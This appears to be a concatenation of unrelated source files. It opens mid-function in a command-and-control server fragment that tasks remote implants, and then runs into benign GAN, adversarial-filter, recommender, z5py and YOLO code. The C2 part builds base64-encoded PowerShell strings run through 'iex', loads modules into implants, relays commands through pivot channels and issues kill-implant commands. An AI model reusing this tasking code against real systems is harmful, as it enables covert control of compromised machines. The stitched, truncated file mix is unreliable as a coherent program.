if (user_command.lower().startswith("run-exe sharpwmi.program sharpwmi action=execute") or user_command.lower().startswith("pbind-command run-exe sharpwmi.program sharpwmi action=execute") or user_command.lower().startswith("fcomm-command run-exe sharpwmi.program sharpwmi action=execute")):
print(user_command[0:200])
print("----TRUNCATED----")
else:
print(user_command)
print(Colours.END)
except Exception as e:
print("Cannot print output: %s" % e)
if task[2].startswith("loadmodule "):
try:
module_name = (task[2]).replace("loadmodule ", "")
if ".exe" in module_name:
modulestr = load_module_sharp(module_name)
elif ".dll" in module_name:
modulestr = load_module_sharp(module_name)
else:
modulestr = load_module(module_name)
command = "loadmodule%s" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
command=""
elif task[2].startswith("run-exe Program PS "):
try:
cmd = (task[2]).replace("run-exe Program PS ", "")
modulestr = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
command = "run-exe Program PS %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pivot-command run-exe Program PS "):
try:
cmd = (task[2]).replace("pbind-pivot-command run-exe Program PS ", "")
base64string = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
modulestr = base64.b64encode(f"run-exe Program PS {base64string}".encode("utf-8")).decode("utf-8")
doublebase64string = base64.b64encode(f"run-exe PBind PBind {modulestr}".encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % doublebase64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-command run-exe Program PS "):
try:
cmd = (task[2]).replace("pbind-command run-exe Program PS ", "")
base64string = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
modulestr = base64.b64encode(f"run-exe Program PS {base64string}".encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("fcomm-command run-exe Program PS "):
try:
cmd = (task[2]).replace("fcomm-command run-exe Program PS ", "")
modulestr = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
command = "run-exe FComm.FCClass FComm run-exe Program PS %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pslo "):
try:
module_name = (task[2]).replace("pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe Program PS loadmodule%s" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pslo"):
try:
module_name = (task[2]).replace("pbind-pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"run-exe Program PS loadmodule%s\"" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pivot-loadmodule "):
try:
module_name = (task[2]).replace("pbind-pivot-loadmodule ", "")
if ".exe" in module_name or ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
base64string = base64.b64encode(f"run-exe PBind PBind \"loadmodule{modulestr}\"".encode("utf-8")).decode("utf-8")
command = f"run-exe PBind PBind {base64string}"
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("fcomm-pslo"):
try:
module_name = (task[2]).replace("fcomm-pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"run-exe Program PS loadmodule%s\"" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-loadmodule "):
try:
module_name = (task[2]).replace("pbind-loadmodule ", "")
if ".exe" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"loadmodule%s\"" % modulestr
elif ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"loadmodule%s\"" % modulestr
else:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module(module_name)
command = "run-exe PBind PBind \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\"" % base64.b64encode(bytes(modulestr, "utf-8")).decode('utf-8')
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-command "):
try:
cmd = command.replace("pbind-command ", "")
base64string = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % base64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-connect"):
command = command.replace("pbind-connect ", "run-exe PBind PBind start ")
elif task[2].startswith("pbind-kill"):
command = command.replace("pbind-kill", "run-exe PBind PBind kill-implant")
elif task[2].startswith("fcomm-loadmodule "):
try:
module_name = (task[2]).replace("fcomm-loadmodule ", "")
if ".exe" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"loadmodule%s\"" % modulestr
elif ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"loadmodule%s\"" % modulestr
else:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module(module_name)
command = "run-exe FComm.FCClass FComm \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\"" % base64.b64encode(bytes(modulestr, "utf-8")).decode('utf-8')
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("fcomm-command "):
command = command.replace("fcomm-command ", "run-exe FComm.FCClass FComm ")
elif task[2].startswith("fcomm-connect"):
command = command.replace("fcomm-connect ", "run-exe FComm.FCClass FComm start ")
elif task[2].startswith("fcomm-kill"):
command = command.replace("fcomm-kill", "run-exe FComm.FCClass FComm kill-implant")
elif task[2].startswith("pbind-pivot-command "):
try:
cmd = command.replace("pbind-pivot-command ", "")
base64string1 = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
base64string = base64.b64encode(f"run-exe PBind PBind {base64string1}".encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % base64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pivot-connect"):
command = command.replace("pbind-pivot-connect ", "run-exe PBind PBind run-exe PBind PBind start ")
elif task[2].startswith("pbind-pivot-kill"):
command = command.replace("pbind-pivot-kill", "run-exe PBind PBind run-exe PBind PBind kill-implant")
# Uncomment to print actual commands that are being sent
# if "AAAAAAAAAAAAAAAAAAAA" not in command:
# print(Colours.BLUE + "Issuing Command: " + command + Colours.GREEN)
command = taskIdStr + command
if commands:
commands += "!d-3dion@LD!-d" + command
else:
commands += command
DB.del_newtasks(str(task[0]))
if commands is not None:
multicmd = "multicmd%s" % commands
try:
responseVal = encrypt(EncKey, multicmd)
except Exception as e:
responseVal = ""
print("Error encrypting value: %s" % e)
now = datetime.datetime.now()
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
return responseVal
elif RandomURI in path and not tasks:
# if there is no tasks but its a normal beacon send 200
now = datetime.datetime.now()
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
return default_response()
|
17044
|
import argparse
import copy
import torch
from torchvision.datasets import MNIST, CIFAR10
import torchvision.transforms as TF
import torchelie as tch
import torchelie.loss.gan.hinge as gan_loss
from torchelie.recipes.gan import GANRecipe
import torchelie.callbacks as tcb
from torchelie.recipes import Recipe
parser = argparse.ArgumentParser()
parser.add_argument('--cpu', action='store_true')
opts = parser.parse_args()
device = 'cpu' if opts.cpu else 'cuda'
BS = 32
tfms = TF.Compose([
TF.Resize(64),
tch.transforms.AdaptPad((64, 64)),
TF.RandomHorizontalFlip(),
TF.ToTensor()])
ds = CIFAR10('~/.cache/torch/cifar10', download=True, transform=tfms)
dl = torch.utils.data.DataLoader(ds,
num_workers=4,
batch_size=BS,
shuffle=True)
def train_net(Gen, Discr):
G = Gen(in_noise=128, out_ch=3)
G_polyak = copy.deepcopy(G).eval()
D = Discr()
print(G)
print(D)
def G_fun(batch):
z = torch.randn(BS, 128, device=device)
fake = G(z)
preds = D(fake * 2 - 1).squeeze()
loss = gan_loss.generated(preds)
loss.backward()
return {'loss': loss.item(), 'imgs': fake.detach()}
def G_polyak_fun(batch):
z = torch.randn(BS, 128, device=device)
fake = G_polyak(z)
return {'imgs': fake.detach()}
def D_fun(batch):
z = torch.randn(BS, 128, device=device)
fake = G(z)
fake_loss = gan_loss.fake(D(fake * 2 - 1))
fake_loss.backward()
x = batch[0]
real_loss = gan_loss.real(D(x * 2 - 1))
real_loss.backward()
loss = real_loss.item() + fake_loss.item()
return {'loss': loss, 'real_loss': real_loss.item(), 'fake_loss':
fake_loss.item()}
loop = GANRecipe(G, D, G_fun, D_fun, G_polyak_fun, dl, log_every=100).to(device)
loop.register('polyak', G_polyak)
loop.G_loop.callbacks.add_callbacks([
tcb.Optimizer(tch.optim.RAdamW(G.parameters(), lr=1e-4, betas=(0., 0.99))),
tcb.Polyak(G, G_polyak),
])
loop.register('G_polyak', G_polyak)
loop.callbacks.add_callbacks([
tcb.Log('batch.0', 'x'),
tcb.WindowedMetricAvg('real_loss'),
tcb.WindowedMetricAvg('fake_loss'),
tcb.Optimizer(tch.optim.RAdamW(D.parameters(), lr=4e-4, betas=(0., 0.99))),
])
loop.test_loop.callbacks.add_callbacks([
tcb.Log('imgs', 'polyak_imgs'),
tcb.VisdomLogger('main', prefix='test')
])
loop.to(device).run(100)
train_net(tch.models.autogan_64, tch.models.snres_discr_4l)
|
17168
|
import torch
import torch.nn as nn
import csv
#image quantization
def quantization(x):
x_quan=torch.round(x*255)/255
return x_quan
#picecwise-linear color filter
def CF(img, param,pieces):
param=param[:,:,None,None]
color_curve_sum = torch.sum(param, 4) + 1e-30
total_image = img * 0
for i in range(pieces):
total_image += torch.clamp(img - 1.0 * i /pieces, 0, 1.0 / pieces) * param[:, :, :, :, i]
total_image *= pieces/ color_curve_sum
return total_image
#parsing the data annotation
def load_ground_truth(csv_filename):
image_id_list = []
label_ori_list = []
label_tar_list = []
with open(csv_filename) as csvfile:
reader = csv.DictReader(csvfile, delimiter=',')
for row in reader:
image_id_list.append( row['ImageId'] )
label_ori_list.append( int(row['TrueLabel']) )
label_tar_list.append( int(row['TargetClass']) )
return image_id_list,label_ori_list,label_tar_list
# simple Module to normalize an image
class Normalize(nn.Module):
def __init__(self, mean, std):
super(Normalize, self).__init__()
self.mean = torch.Tensor(mean)
self.std = torch.Tensor(std)
def forward(self, x):
return (x - self.mean.type_as(x)[None,:,None,None]) / self.std.type_as(x)[None,:,None,None]
# values are standard normalization for ImageNet images,
# from https://github.com/pytorch/examples/blob/master/imagenet/main.py
norm = Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
|
17183
|
import os
import time
import argparse
import pandas as pd
from smf import SessionMF
parser = argparse.ArgumentParser()
parser.add_argument('--K', type=int, default=20, help="K items to be used in Recall@K and MRR@K")
parser.add_argument('--factors', type=int, default=100, help="Number of latent factors.")
parser.add_argument('--batch', type=int, default=32, help="Batch size for the training process")
parser.add_argument('--momentum', type=float, default=0.0, help="Momentum of the optimizer adagrad_sub")
parser.add_argument('--regularization', type=float, default=0.0001, help="Regularization Amount of the objective function")
parser.add_argument('--dropout', type=float, default=0.0, help="Share of items that are randomly discarded from the current session while training")
parser.add_argument('--skip', type=float, default=0.0, help="Probability that an item is skiped and the next one is used as the positive example")
parser.add_argument('--neg_samples', type=int, default=2048, help="Number of items that are sampled as negative examples")
parser.add_argument('--activation', type=str, default='linear', help="Final activation function (linear, sigmoid, uf_sigmoid, hard_sigmoid, relu, softmax, softsign, softplus, tanh)")
parser.add_argument('--objective', type=str, default='bpr_max', help="Loss Function (bpr_max, top1_max, bpr, top1)")
parser.add_argument('--epochs', type=int, default=10, help="Number of Epochs")
parser.add_argument('--lr', type=float, default=0.001, help="Learning Rate")
parser.add_argument('--itemid', default='ItemID', type=str)
parser.add_argument('--sessionid', default='SessionID', type=str)
parser.add_argument('--valid_data', default='recSys15Valid.txt', type=str)
parser.add_argument('--train_data', default='recSys15TrainOnly.txt', type=str)
parser.add_argument('--data_folder', default='/home/icvuser/Desktop/Recsys cleaned data/RecSys15 Dataset Splits', type=str)
# Get the arguments
args = parser.parse_args()
train_data = os.path.join(args.data_folder, args.train_data)
x_train = pd.read_csv(train_data)
x_train.sort_values(args.sessionid, inplace=True)
x_train = x_train.iloc[-int(len(x_train) / 64) :] #just take 1/64 last instances
valid_data = os.path.join(args.data_folder, args.valid_data)
x_valid = pd.read_csv(valid_data)
x_valid.sort_values(args.sessionid, inplace=True)
print('Finished Reading Data \nStart Model Fitting...')
# Fitting Model
t1 = time.time()
model = SessionMF(factors = args.factors, session_key = args.sessionid, item_key = args.itemid,
batch = args.batch, momentum = args.momentum, regularization = args.regularization,
dropout = args.dropout, skip = args.skip, samples = args.neg_samples,
activation = args.activation, objective = args.objective, epochs = args.epochs, learning_rate = args.lr)
model.fit(x_train)
t2 = time.time()
print('End Model Fitting with total time =', t2 - t1, '\n Start Predictions...')
# Test Set Evaluation
test_size = 0.0
hit = 0.0
MRR = 0.0
cur_length = 0
cur_session = -1
last_items = []
t1 = time.time()
index_item = x_valid.columns.get_loc(args.itemid)
index_session = x_valid.columns.get_loc(args.sessionid)
train_items = model.unique_items
counter = 0
for row in x_valid.itertuples( index=False ):
counter += 1
if counter % 10000 == 0:
print('Finished Prediction for ', counter, 'items.')
session_id, item_id = row[index_session], row[index_item]
if session_id != cur_session:
cur_session = session_id
last_items = []
cur_length = 0
if item_id in model.item_map.keys():
if len(last_items) > cur_length: #make prediction
cur_length += 1
test_size += 1
# Predict the most similar items to items
predictions = model.predict_next(last_items, K = args.K)
# Evaluation
rank = 0
for predicted_item in predictions:
#print(predicted_item, item_id, '###')
rank += 1
if int(predicted_item) == item_id:
hit += 1.0
MRR += 1/rank
break
last_items.append(item_id)
t2 = time.time()
print('Recall: {}'.format(hit / test_size))
print ('\nMRR: {}'.format(MRR / test_size))
print('End Model Predictions with total time =', t2 - t1)
|
17196
|
import os
from itertools import product
from concurrent import futures
from contextlib import closing
from datetime import datetime
import numpy as np
from . import _z5py
from .file import File, S3File
from .dataset import Dataset
from .shape_utils import normalize_slices
def product1d(inrange):
for ii in inrange:
yield ii
def blocking(shape, block_shape, roi=None, center_blocks_at_roi=False):
""" Generator for nd blocking.
Args:
shape (tuple): nd shape
block_shape (tuple): nd block shape
roi (tuple[slice]): region of interest (default: None)
center_blocks_at_roi (bool): if given a roi,
whether to center the blocks being generated
at the roi's origin (default: False)
"""
assert len(shape) == len(block_shape), "Invalid number of dimensions."
if roi is None:
# compute the ranges for the full shape
ranges = [range(sha // bsha if sha % bsha == 0 else sha // bsha + 1)
for sha, bsha in zip(shape, block_shape)]
min_coords = [0] * len(shape)
max_coords = shape
else:
# make sure that the roi is valid
roi, _ = normalize_slices(roi, shape)
ranges = [range(rr.start // bsha,
rr.stop // bsha if rr.stop % bsha == 0 else rr.stop // bsha + 1)
for rr, bsha in zip(roi, block_shape)]
min_coords = [rr.start for rr in roi]
max_coords = [rr.stop for rr in roi]
need_shift = False
if roi is not None and center_blocks_at_roi:
shift = [rr.start % bsha for rr, bsha in zip(roi, block_shape)]
need_shift = sum(shift) > 0
# product raises memory error for too large ranges,
# because input iterators are cast to tuple
# so far I have only seen this for 1d "open-ended" datasets
# and hence just implemented a workaround for this case,
# but it should be fairly easy to implement an nd version of product
# without casting to tuple for our use case using the imglib loop trick, see also
# https://stackoverflow.com/questions/8695422/why-do-i-get-a-memoryerror-with-itertools-product
try:
start_points = product(*ranges)
except MemoryError:
assert len(ranges) == 1
start_points = product1d(ranges)
for start_point in start_points:
positions = [sp * bshape for sp, bshape in zip(start_point, block_shape)]
if need_shift:
positions = [pos + sh for pos, sh in zip(positions, shift)]
if any(pos > maxc for pos, maxc in zip(positions, max_coords)):
continue
yield tuple(slice(max(pos, minc), min(pos + bsha, maxc))
for pos, bsha, minc, maxc in zip(positions, block_shape,
min_coords, max_coords))
def copy_dataset_impl(f_in, f_out, in_path_in_file, out_path_in_file,
n_threads, chunks=None, block_shape=None, dtype=None,
roi=None, fit_to_roi=False, **new_compression):
""" Implementation of copy dataset.
Used to implement `copy_dataset`, `convert_to_h5` and `convert_from_h5`.
Can also be used for more flexible use cases, like copying from a zarr/n5
cloud dataset to a filesytem dataset.
Args:
f_in (File): input file object.
f_out (File): output file object.
in_path_in_file (str): name of input dataset.
out_path_in_file (str): name of output dataset.
n_threads (int): number of threads used for copying.
chunks (tuple): chunks of the output dataset.
By default same as input dataset's chunks. (default: None)
block_shape (tuple): block shape used for copying. Must be a multiple
of ``chunks``, which are used by default (default: None)
dtype (str): datatype of the output dataset, default does not change datatype (default: None).
roi (tuple[slice]): region of interest that will be copied. (default: None)
fit_to_roi (bool): if given a roi, whether to set the shape of
the output dataset to the roi's shape
and align chunks with the roi's origin. (default: False)
**new_compression: compression library and options for output dataset. If not given,
the same compression as in the input is used.
"""
ds_in = f_in[in_path_in_file]
# check if we can copy chunk by chunk
in_is_z5 = isinstance(f_in, (File, S3File))
out_is_z5 = isinstance(f_out, (File, S3File))
copy_chunks = (in_is_z5 and out_is_z5) and (chunks is None or chunks == ds_in.chunks) and (roi is None)
# get dataset metadata from input dataset if defaults were given
chunks = ds_in.chunks if chunks is None else chunks
dtype = ds_in.dtype if dtype is None else dtype
# zarr objects may not have compression attribute. if so set it to the settings sent to this function
if not hasattr(ds_in, "compression"):
ds_in.compression = new_compression
compression = new_compression.pop("compression", ds_in.compression)
compression_opts = new_compression
same_lib = in_is_z5 == out_is_z5
if same_lib and compression == ds_in.compression:
compression_opts = compression_opts if compression_opts else ds_in.compression_opts
if out_is_z5:
compression = None if compression == 'raw' else compression
compression_opts = {} if compression_opts is None else compression_opts
else:
compression_opts = {'compression_opts': None} if compression_opts is None else compression_opts
# if we don't have block-shape explitictly given, use chunk size
# otherwise check that it's a multiple of chunks
if block_shape is None:
block_shape = chunks
else:
assert all(bs % ch == 0 for bs, ch in zip(block_shape, chunks)),\
"block_shape must be a multiple of chunks"
shape = ds_in.shape
# we need to create the blocking here, before the shape is potentially altered
# if fit_to_roi == True
blocks = blocking(shape, block_shape, roi, fit_to_roi)
if roi is not None:
roi, _ = normalize_slices(roi, shape)
if fit_to_roi:
shape = tuple(rr.stop - rr.start for rr in roi)
ds_out = f_out.require_dataset(out_path_in_file,
dtype=dtype,
shape=shape,
chunks=chunks,
compression=compression,
**compression_opts)
def write_single_block(bb):
data_in = ds_in[bb].astype(dtype, copy=False)
if np.sum(data_in) == 0:
return
if fit_to_roi and roi is not None:
bb = tuple(slice(b.start - rr.start, b.stop - rr.start)
for b, rr in zip(bb, roi))
ds_out[bb] = data_in
def write_single_chunk(bb):
chunk_id = tuple(b.start // ch for b, ch in zip(bb, chunks))
chunk_in = ds_in.read_chunk(chunk_id)
if chunk_in is None:
return
# check if this is a varlen chunk
varlen = tuple(chunk_in.shape) != tuple(b.stop - b.start for b in bb)
ds_out.write_chunk(chunk_id, chunk_in.astype(dtype, copy=False), varlen)
write_single = write_single_chunk if copy_chunks else write_single_block
with futures.ThreadPoolExecutor(max_workers=n_threads) as tp:
tasks = [tp.submit(write_single, bb) for bb in blocks]
[t.result() for t in tasks]
# copy attributes
in_attrs = ds_in.attrs
out_attrs = ds_out.attrs
for key, val in in_attrs.items():
out_attrs[key] = val
def copy_dataset(in_path, out_path,
in_path_in_file, out_path_in_file,
n_threads, chunks=None,
block_shape=None, dtype=None,
use_zarr_format=None, roi=None,
fit_to_roi=False, **new_compression):
""" Copy dataset, optionally change metadata.
The input dataset will be copied to the output dataset chunk by chunk.
Allows to change chunks, datatype, file format and compression.
Can also just copy a roi.
Args:
in_path (str): path to the input file.
out_path (str): path to the output file.
in_path_in_file (str): name of input dataset.
out_path_in_file (str): name of output dataset.
n_threads (int): number of threads used for copying.
chunks (tuple): chunks of the output dataset.
By default same as input dataset's chunks. (default: None)
block_shape (tuple): block shape used for copying. Must be a multiple
of ``chunks``, which are used by default (default: None)
dtype (str): datatype of the output dataset, default does not change datatype (default: None).
use_zarr_format (bool): file format of the output file,
default does not change format (default: None).
roi (tuple[slice]): region of interest that will be copied. (default: None)
fit_to_roi (bool): if given a roi, whether to set the shape of
the output dataset to the roi's shape
and align chunks with the roi's origin. (default: False)
**new_compression: compression library and options for output dataset. If not given,
the same compression as in the input is used.
"""
f_in = File(in_path)
# check if the file format was specified
# if not, keep the format of the input file
# otherwise set the file format
is_zarr = f_in.is_zarr if use_zarr_format is None else use_zarr_format
f_out = File(out_path, use_zarr_format=is_zarr)
copy_dataset_impl(f_in, f_out, in_path_in_file, out_path_in_file,
n_threads, chunks=chunks, block_shape=block_shape,
dtype=dtype, roi=roi, fit_to_roi=fit_to_roi,
**new_compression)
def copy_group(in_path, out_path, in_path_in_file, out_path_in_file, n_threads):
""" Copy group recursively.
Copy the group recursively, using copy_dataset. Metadata of datasets that
are copied cannot be changed and rois cannot be applied.
Args:
in_path (str): path to the input file.
out_path (str): path to the output file.
in_path_in_file (str): name of input group.
out_path_in_file (str): name of output group.
n_threads (int): number of threads used to copy datasets.
"""
f_in = File(in_path)
f_out = File(out_path)
def copy_attrs(gin, gout):
in_attrs = gin.attrs
out_attrs = gout.attrs
for key, val in in_attrs.items():
out_attrs[key] = val
g_in = f_in[in_path_in_file]
g_out = f_out.require_group(out_path_in_file)
copy_attrs(g_in, g_out)
def copy_object(name, obj):
abs_in_key = os.path.join(in_path_in_file, name)
abs_out_key = os.path.join(out_path_in_file, name)
if isinstance(obj, Dataset):
copy_dataset(in_path, out_path,
abs_in_key, abs_out_key, n_threads)
else:
g = f_out.require_group(abs_out_key)
copy_attrs(obj, g)
g_in.visititems(copy_object)
class Timer:
def __init__(self):
self.start_time = None
self.stop_time = None
@property
def elapsed(self):
try:
return (self.stop_time - self.start_time).total_seconds()
except TypeError as e:
if "'NoneType'" in str(e):
raise RuntimeError("{} either not started, or not stopped".format(self))
def start(self):
self.start_time = datetime.utcnow()
def stop(self):
self.stop_time = datetime.utcnow()
return self.elapsed
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
def fetch_test_data_stent():
from imageio import volread
data_i16 = volread('imageio:stent.npz')
return (data_i16 / data_i16.max() * 255).astype(np.uint8)
def fetch_test_data():
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
try:
from io import BytesIO as Buffer
except ImportError:
from StringIO import StringIO as Buffer
import zipfile
from imageio import volread
im_url = "https://imagej.nih.gov/ij/images/t1-head-raw.zip"
with closing(urlopen(im_url)) as response:
if response.status != 200:
raise RuntimeError("Test data could not be found at {}, status code {}".format(
im_url, response.status
))
zip_buffer = Buffer(response.read())
with zipfile.ZipFile(zip_buffer) as zf:
tif_buffer = Buffer(zf.read('JeffT1_le.tif'))
return np.asarray(volread(tif_buffer, format='tif'), dtype=np.uint8)
def remove_trivial_chunks(dataset, n_threads,
remove_specific_value=None):
""" Remove chunks that only contain a single value.
The input dataset will be copied to the output dataset chunk by chunk.
Allows to change datatype, file format and compression as well.
Args:
dataset (z5py.Dataset)
n_threads (int): number of threads
remove_specific_value (int or float): only remove chunks that contain (only) this specific value (default: None)
"""
dtype = dataset.dtype
function = getattr(_z5py, 'remove_trivial_chunks_%s' % dtype)
remove_specific = remove_specific_value is not None
value = remove_specific_value if remove_specific else 0
function(dataset._impl, n_threads, remove_specific, value)
def remove_dataset(dataset, n_threads):
""" Remvoe dataset multi-threaded.
"""
_z5py.remove_dataset(dataset._impl, n_threads)
def remove_chunk(dataset, chunk_id):
""" Remove a chunk
"""
dataset._impl.remove_chunk(dataset._impl, chunk_id)
def remove_chunks(dataset, bounding_box):
""" Remove all chunks overlapping the bounding box
"""
shape = dataset.shape
chunks = dataset.chunks
blocks = blocking(shape, chunks, roi=bounding_box)
for block in blocks:
chunk_id = tuple(b.start // ch for b, ch in zip(block, chunks))
remove_chunk(dataset, chunk_id)
def unique(dataset, n_threads, return_counts=False):
""" Find unique values in dataset.
Args:
dataset (z5py.Dataset)
n_threads (int): number of threads
return_counts (bool): return counts of unique values (default: False)
"""
dtype = dataset.dtype
if return_counts:
function = getattr(_z5py, 'unique_with_counts_%s' % dtype)
else:
function = getattr(_z5py, 'unique_%s' % dtype)
return function(dataset._impl, n_threads)
|
17246
|
import os
import numpy as np
import tensorflow as tf
import cv2
import time
import sys
import pickle
import ROLO_utils as util
class YOLO_TF:
fromfile = None
tofile_img = 'test/output.jpg'
tofile_txt = 'test/output.txt'
imshow = True
filewrite_img = False
filewrite_txt = False
disp_console = True
weights_file = 'weights/YOLO_small.ckpt'
alpha = 0.1
threshold = 0.08
iou_threshold = 0.5
num_class = 20
num_box = 2
grid_size = 7
classes = ["aeroplane", "bicycle", "bird", "boat", "bottle", "bus", "car", "cat", "chair", "cow", "diningtable", "dog", "horse", "motorbike", "person", "pottedplant", "sheep", "sofa", "train","tvmonitor"]
w_img, h_img = [352, 240]
num_feat = 4096
num_predict = 6 # final output of LSTM 6 loc parameters
num_heatmap = 1024
def __init__(self,argvs = []):
self.argv_parser(argvs)
self.build_networks()
if self.fromfile is not None: self.detect_from_file(self.fromfile)
def argv_parser(self,argvs):
for i in range(1,len(argvs),2):
if argvs[i] == '-fromfile' : self.fromfile = argvs[i+1]
if argvs[i] == '-tofile_img' : self.tofile_img = argvs[i+1] ; self.filewrite_img = True
if argvs[i] == '-tofile_txt' : self.tofile_txt = argvs[i+1] ; self.filewrite_txt = True
if argvs[i] == '-imshow' :
if argvs[i+1] == '1' :self.imshow = True
else : self.imshow = False
if argvs[i] == '-disp_console' :
if argvs[i+1] == '1' :self.disp_console = True
else : self.disp_console = False
def build_networks(self):
if self.disp_console : print "Building YOLO_small graph..."
self.x = tf.placeholder('float32',[None,448,448,3])
self.conv_1 = self.conv_layer(1,self.x,64,7,2)
self.pool_2 = self.pooling_layer(2,self.conv_1,2,2)
self.conv_3 = self.conv_layer(3,self.pool_2,192,3,1)
self.pool_4 = self.pooling_layer(4,self.conv_3,2,2)
self.conv_5 = self.conv_layer(5,self.pool_4,128,1,1)
self.conv_6 = self.conv_layer(6,self.conv_5,256,3,1)
self.conv_7 = self.conv_layer(7,self.conv_6,256,1,1)
self.conv_8 = self.conv_layer(8,self.conv_7,512,3,1)
self.pool_9 = self.pooling_layer(9,self.conv_8,2,2)
self.conv_10 = self.conv_layer(10,self.pool_9,256,1,1)
self.conv_11 = self.conv_layer(11,self.conv_10,512,3,1)
self.conv_12 = self.conv_layer(12,self.conv_11,256,1,1)
self.conv_13 = self.conv_layer(13,self.conv_12,512,3,1)
self.conv_14 = self.conv_layer(14,self.conv_13,256,1,1)
self.conv_15 = self.conv_layer(15,self.conv_14,512,3,1)
self.conv_16 = self.conv_layer(16,self.conv_15,256,1,1)
self.conv_17 = self.conv_layer(17,self.conv_16,512,3,1)
self.conv_18 = self.conv_layer(18,self.conv_17,512,1,1)
self.conv_19 = self.conv_layer(19,self.conv_18,1024,3,1)
self.pool_20 = self.pooling_layer(20,self.conv_19,2,2)
self.conv_21 = self.conv_layer(21,self.pool_20,512,1,1)
self.conv_22 = self.conv_layer(22,self.conv_21,1024,3,1)
self.conv_23 = self.conv_layer(23,self.conv_22,512,1,1)
self.conv_24 = self.conv_layer(24,self.conv_23,1024,3,1)
self.conv_25 = self.conv_layer(25,self.conv_24,1024,3,1)
self.conv_26 = self.conv_layer(26,self.conv_25,1024,3,2)
self.conv_27 = self.conv_layer(27,self.conv_26,1024,3,1)
self.conv_28 = self.conv_layer(28,self.conv_27,1024,3,1)
self.fc_29 = self.fc_layer(29,self.conv_28,512,flat=True,linear=False)
self.fc_30 = self.fc_layer(30,self.fc_29,4096,flat=False,linear=False)
#skip dropout_31
self.fc_32 = self.fc_layer(32,self.fc_30,1470,flat=False,linear=True)
self.sess = tf.Session()
self.sess.run(tf.initialize_all_variables())
self.saver = tf.train.Saver()
self.saver.restore(self.sess,self.weights_file)
if self.disp_console : print "Loading complete!" + '\n'
def conv_layer(self,idx,inputs,filters,size,stride):
channels = inputs.get_shape()[3]
weight = tf.Variable(tf.truncated_normal([size,size,int(channels),filters], stddev=0.1))
biases = tf.Variable(tf.constant(0.1, shape=[filters]))
pad_size = size//2
pad_mat = np.array([[0,0],[pad_size,pad_size],[pad_size,pad_size],[0,0]])
inputs_pad = tf.pad(inputs,pad_mat)
conv = tf.nn.conv2d(inputs_pad, weight, strides=[1, stride, stride, 1], padding='VALID',name=str(idx)+'_conv')
conv_biased = tf.add(conv,biases,name=str(idx)+'_conv_biased')
if self.disp_console : print ' Layer %d : Type = Conv, Size = %d * %d, Stride = %d, Filters = %d, Input channels = %d' % (idx,size,size,stride,filters,int(channels))
